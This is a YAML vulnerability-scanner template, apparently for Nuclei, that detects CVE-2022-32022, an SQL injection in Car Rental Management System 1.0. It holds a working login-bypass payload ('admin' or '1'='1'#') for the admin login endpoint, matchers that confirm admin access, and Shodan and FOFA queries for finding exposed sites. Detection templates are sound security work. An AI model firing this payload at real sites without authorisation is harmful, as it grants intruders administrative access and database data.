id: CVE-2022-32022

info:
  name: Car Rental Management System 1.0 - SQL Injection
  author: arafatansari
  severity: high
  description: |
    Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/ajax.php?action=login. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-32022
    - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2022-32022
    cwe-id: CWE-89
    epss-score: 0.00897
    epss-percentile: 0.80882
    cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: car_rental_management_system_project
    product: car_rental_management_system
    shodan-query:
      - http.html:"Car Rental Management System"
      - http.html:"car rental management system"
    fofa-query: body="car rental management system"
  tags: cve,cve2022,carrental,cms,sqli,login-bypass,car_rental_management_system_project

http:
  - raw:
      - |
        POST /admin/ajax.php?action=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin'+or+'1'%3D'1'%23&password=admin
      - |
        GET /admin/index.php?page=home HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Welcome back Administrator!'
          - 'action=logout'
          - 'Manage Account'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402206b05131a3d868e8a0a363c1a5b71808995d344e6512f466e2dc3d5079babb28702201d801ac3984d3882486e6ddf696459a4bb3cb1c6559be826b80b08dc63855eff:922c64590222798bb761d5b6d8e72950